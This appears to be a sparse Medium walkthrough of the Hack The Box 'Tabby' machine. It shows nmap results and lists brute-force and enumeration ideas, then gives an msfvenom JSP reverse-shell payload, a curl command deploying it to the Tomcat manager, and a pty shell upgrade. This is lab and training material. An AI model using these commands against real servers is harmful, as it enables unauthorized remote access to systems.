Hack The Box — Tabby

nmap -A -T4 10.10.10.194PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
  1. Try to search for exploits in apache 2.4.41 by using searchsploit tool
  2. Try to brute-force ssh credentials by using nmap scripts and brutespray tool
  3. Try to brute-force tomcat credentials by using metasploit and nmap scirpts
  4. Try to enumerate website at 10.10.10.194:80 and 10.10.10.194:8080 and content discovery by using dirbuster/dirsearch/ffuf/gobuster

1. Public exploitation

2. SSH Credentials

3. Tomcat login credentials brute force

4. Website Enumeration and content discovery

reverse shell payload → msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.wardeploy your payload curl --upload-file <path/to/shell.war> "http://megahosting:8080/manager/deploy/text?path=/shell&update=true"
Vulnerable machine > python3 -m http.server 80
Attack machine > wget http://10.10.10.194:80/backup-file-name
python -c 'import pty; pty.spawn("/bin/bash")'

Congrats and Thank you ❤

Stay in touch

--

--

--

Offensive Security Enthusiast — twitter @eslam3kll

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What to expect from Utah’s new privacy law

Facing the facts about data breach

Story of Store Xss

Career in Cyber Security

Hack The Box — Time

{UPDATE} The Sex Game Hack Free Resources Generator

{UPDATE} Bind free - addictive puzzle game Hack Free Resources Generator

Getting your privacy acronyms and their requirements rights: GDPR, CCPA, LGPD, PoPI

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Eslam Akl

Eslam Akl

Offensive Security Enthusiast — twitter @eslam3kll

More from Medium

TryHackMe: Nmap Post Port Scans Walkthrough

HTB - Sick Rop [Pwn]

CVE-2021–40662 Chamilo LMS 1.11.14 RCE

Hack The Box — Dancing